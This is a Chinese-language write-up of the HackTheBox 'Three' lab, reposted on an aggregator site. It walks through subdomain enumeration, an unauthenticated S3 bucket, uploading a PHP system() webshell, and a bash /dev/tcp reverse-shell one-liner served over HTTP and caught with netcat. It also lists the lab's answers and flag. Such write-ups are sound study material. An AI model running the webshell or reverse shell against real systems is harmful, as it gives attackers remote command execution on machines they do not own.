HTB-Three(云服务)

news2024/12/27 13:15:22

前言

  • 各位师傅大家好,我是qmx_07,今天给大家讲解Three靶机
    在这里插入图片描述

渗透过程

信息搜集

在这里插入图片描述
在这里插入图片描述

  • 服务器开启了22 SSH 和 80 HTTP服务端口

扫描目录

在这里插入图片描述

  • 服务器只有一个image图片文件,ssh 需要账号名密码

绑定域名 进行子域名扫描探测

在这里插入图片描述

  • 疑似域名,尝试绑定
echo "10.129.227.248 thetoppers.htb" | tee -a /etc/hosts

在这里插入图片描述

  • gobuster中 vhost 表示探测子域名
  • –append-domain 表示 返回正确的子域名
echo "10.129.227.248 s3.thetoppers.htb" | tee -a /etc/hosts
  • 绑定子域名
    在这里插入图片描述
  • s3子域名 s3是亚马逊云存储的简单存储服务,全程是Simple Storage Service

awscli连接云存储桶

  • 介绍:AWS Command Line Interface (AWS CLI)是一种命令行工具,用于与AWS服务进行交互和管理。它提供了一组命令,可以用于创建、配置和管理AWS资源,以及进行自动化和脚本化操作

在这里插入图片描述

  • 安装awscli

在这里插入图片描述

  • 配置awscli,由于这个服务器不对身份进行验证,所以随便写写就行
    在这里插入图片描述
  • 通过云服务访问目录
  • 这个云服务 没有进行身份认证,所以可以直接访问
    在这里插入图片描述
system()函数代表 执行系统命令,参数是cmd
--endpoint=http://s3.thetoppers.htb 代表连接到自定义S3服务节点
s3 代表要与S3服务进行交互
cp 上传文件
xx.php 上传源文件
s3://thetoppers.htb s3协议目标地址

在这里插入图片描述

  • 上传命令执行文件,并查看是否存在
    在这里插入图片描述

通过nc反弹会话

在这里插入图片描述

  • 写一份reverse.sh 反弹会话shell文件,通过bash命令反弹nc会话
bash -i >& /dev/tcp/10.10.16.3/9000 0>&1  ip和端口根据实际决定
  • 开启http服务器
python3 -m http.server

在这里插入图片描述

  • 访问reverse.sh文件 并以bash形式运行
    在这里插入图片描述
  • 监听端口上线服务器

nc全称是netcat,用于创建 TCP/IP 连接、传输数据,以及监听和接收网络连接

  • -l:表示监听模式,用于创建一个监听器以等待传入连接。
  • -v:表示详细模式,用于显示详细的调试信息。
  • -n:表示禁用 DNS 解析,用于显示 IP 地址而不是主机名。
  • -p:指定监听的端口号
    在这里插入图片描述
  • flag:a980d99281a28d638ac68b9bf9453c2b

知识点讲解

Amazon S3

  • 介绍:亚马逊网络服务(AWS)提供的一种对象存储服务,旨在存储和检索任意量的数据
  • 对象存储:S3 将数据存储为对象,而不是传统的文件系统结构。每个对象由数据、元数据和唯一标识符(键)组成。
  • 桶(Bucket):S3 中的数据存储在称为“桶”的容器中。每个桶都有一个唯一的名称,并且可以在全球范围内访问。

答案

  • 1.服务器上开放了多少个TCP端口?

2

  • 2.在网站上找到的域名是?

thetoppers.htb

  • 3.哪个linux文件可以指定DNS绑定ip?

/etc/hosts

  • 4.子域名是什么?

s3.thetoppers.htb

  • 5.子域名上运行了哪些服务?

Amazon S3

  • 6.哪个工具可以和aws进行交互?

awscli

  • 7.什么命令可以配置aws?

aws configure

  • 8.什么命令可以列出s3的所有存储桶?

aws s3 ls

  • 9.服务器使用什么后端语言文件?

php

  • 10.flag?

a980d99281a28d638ac68b9bf9453c2b

总结

  • 今天讲解了S3云服务,awscli连接工具,子域名探测,http开启文件服务器,php命令执行文件,nc反弹会话

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2096681.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

中秋之美——html5+css+js制作中秋网页

中秋之美——html5cssjs制作中秋网页 一、前言二、功能展示三、系统实现四、其它五、源码下载 一、前言 八月十五,秋已过半,是为中秋。 “但愿人长久,千里共婵娟”,中秋时节,气温已凉未寒,天高气爽&#x…

支付平台构建支付接口供整个公司调用—支付代理商

一、支付平台一般需要对外开放用于满足一体化平台调用 支付平台提供支付接口具有以下必要性: 1. 拓展业务范围:使各类商家和服务提供商能够接入支付服务,从而扩大支付平台的用户群体和业务覆盖范围。 2. 提升用户体验:为不同的应…

音视频-图像篇(YUV和RGB)

文章目录 一、图像基础概念二、YUV与RGB1.YUV分类方式2.YUV“空间-间”的数据划分1)UV按照“空间-间”的划分方式,分为YUV444、YUV422、YUV4202)YUV“空间-内”的数据划分 3.RGB 三、比较JPG、PNG、GIF、BMP图片格式 一、图像基础概念 像素&…

Python OpenCV 入门指南

引言 OpenCV(Open Source Computer Vision Library)是一个开源的计算机视觉库,它包含了大量的用于实时图像分析和视频处理的功能。Python 作为一种流行的编程语言,以其易用性和灵活性成为了进行快速原型设计和开发的理想选择。结…

【python2C】排序算法

题&#xff1a;逆序对&#xff08;NXD&#xff09; 对于给定的一段正整数序列a&#xff0c;逆序对就是序列中 a[i]​>a[j]​ 且 i<j 的有序对。 输入格式 第一行&#xff0c;一个正整数 n&#xff0c;表示序列中有 n个数&#xff0c;n<5e5 第二行&#xff0c; n 个正整…

学习之git

github 创建远程仓库 代码推送 Push 代码拉取 Pull 代码克隆 Clone SSH免密登录 Idea集成GitHubGitee码云 码云创建远程仓库 Idea集成Gitee码云 码云连接Github进行代码的复制和迁移GitLab gitlab服务器的搭建和部署 Idea集成GitLabgit概述 一切皆本地 版本控制工具 集中…

读软件开发安全之道:概念、设计与实施15安全测试

1. 安全测试 1.1. 测试是开发可靠、安全代码中的关键一环 1.2. 测试安全漏洞的目的是主动检测 1.3. 模糊测试是一种强大的补充技术&#xff0c;可以帮助我们找到更深层次的问题 1.4. 针对当前漏洞创建的安全回归测试&#xff0c;目的是确保我们不会再犯相同的错误 1.5. 大…

LabVIEW焊缝视觉识别系统

随着自动化技术的发展&#xff0c;焊接工艺也在向智能化和自动化转型。介绍了一种基于LabVIEW开发的自动化焊接机器人视觉识别系统&#xff0c;用于提高焊接质量和效率&#xff0c;特别适用于复杂或危险环境下的操作。 项目背景 在传统焊接工艺中&#xff0c;焊接质量和效率受…

linux 文件管理命令

Ctrl h, 在对应的文件夹路径下显示文件内容 2.“~”、“/”、“./”分别代表什么&#xff1f; https://blog.csdn.net/shuaiqidexiaojiejie/article/details/132563658 2.1&#xff0c;“~”表示主目录&#xff0c;也就是当前登录用户的用户目录 cd ~, 表示返回到Home目录 2.2…

使用 GZCTF 结合 GitHub 仓库搭建独立容器与动态 Flag 的 CTF 靶场以及基于 Docker 的 Web 出题与部署

写在前面 关于 CTF 靶场的搭建&#xff08;使用 CTFd 或者 H1ve&#xff09;以及 AWD 攻防平台的搭建&#xff0c;勇师傅在前面博客已经详细写过&#xff0c;可以参考我的《网站搭建》专栏&#xff0c;前段时间玩那个 BaseCTF&#xff0c;发现它的界面看着挺不错的&#xff0c…

esp8266根据httpserver状态,调用网络唤醒,实现一键开机

esp8266根据httpserver状态&#xff0c;调用网络唤醒&#xff0c;实现一键开机 一.开发板程序二. 服务端三.服务端状态变更 一.开发板程序 #include <ESP8266WiFi.h> #include <ESP8266HTTPClient.h> #include <WiFiUdp.h> #include <ArduinoJson.h>/…

C语言深入理解指针1

1. 内存和地址 1.1内存 内存空间如何高效管理?把内存划分一个个的内存单元&#xff0c;每个内存单元的大小取一个字节一个比特位可以存储一个2进制的位1或者0&#xff0c;那么一个内存单元可以放8个比特位&#xff0c;每个内存单元都有一个编号&#xff0c;有了内存单元的编…

Golang | Leetcode Golang题解之第389题找不同

题目&#xff1a; 题解&#xff1a; func findTheDifference(s, t string) (diff byte) {for i : range s {diff ^ s[i] ^ t[i]}return diff ^ t[len(t)-1] }

自然美景短视频素材哪里找?9个美景视频素材库网站分享

你是否曾被窗外的落日余晖震撼&#xff0c;或是被雄伟的山脉和蔚蓝的大海深深吸引&#xff1f;想要分享这世界的美好&#xff0c;却苦于没有合适的视频素材&#xff1f;今天&#xff0c;就让我带你探索那些充满自然韵味的素材宝库&#xff0c;帮你捕捉和分享自然的美丽&#xf…

Linux下安装MySQL8.0

一、安装 1.下载安装包 先创建一个mysql目录&#xff0c;在将压缩包下载到此 # 下载tar包 wget https://dev.mysql.com/get/Downloads/MySQL-8.0/mysql-8.0.20-linux-glibc2.12-x86_64.tar.xz等待下载成功 2.解压mysql8.0安装包 tar xvJf mysql-8.0.20-linux-glibc2.12-x86…

sqli-labs第五、六关详解

第五关不同于前面四关&#xff0c;涉及到盲注 首先看看是字符型注入还是数字型注入 用单引号闭合后&#xff0c;and 12无回显&#xff0c;说明字符型注入&#xff0c;接下来就要靠猜了&#xff0c;首先猜数据库长度是多少 长度为8的时候&#xff0c;正常回显&#xff0c;所以数…

DFS解决floodfill算法

文章目录 1. 图像渲染2. 岛屿数量3. 岛屿的最大面积4. 被围绕的区域5. 太平洋大西洋水流问题6. 扫雷游戏7. 机器人的运动范围 1. 图像渲染 算法原理&#xff1a; 这题不需要创建visit数组去记录使用过的节点&#xff0c;因为我每次dfs都尝试修改image数组的值&#xff0c;当下…

电阻器件的选型

电阻选型需要的注意点&#xff1a; 老化系数:电阻器在额定功率长期负荷下&#xff0c;阻值相对变化的百分数&#xff0c;它是表示电阻器寿命长短的参数。 噪声:包括热噪声和电流噪声两部分&#xff0c;电阻是一个耗能的器件&#xff0c;电阻器是消耗能量的。 电阻的选型需要关注…

STM32 Debug卡死在BKPT 0xAB

今天在调试程序的时候遇到了这个问题&#xff0c;最后发现是因为没有初始化串口&#xff0c;就调用了printf函数导致的&#xff0c;如果不需要用串口调试数据&#xff0c;那么需要把它们注释掉&#xff0c;否则就会出现这个问题&#xff01;

Force Yc团队最新第五次创作引导页源码

Force Yc团队最新第五次创作引导页源码 此源码可以播放自己的音乐 无法播放视频背景&#xff01;~ 音乐修改:music 音乐名称:bgm.mp3 LOGO修改:images 图片名字:top-logo.mp4 文本修改:index.html Notepad编辑 Force Yc团队最新第五次创作引导页源码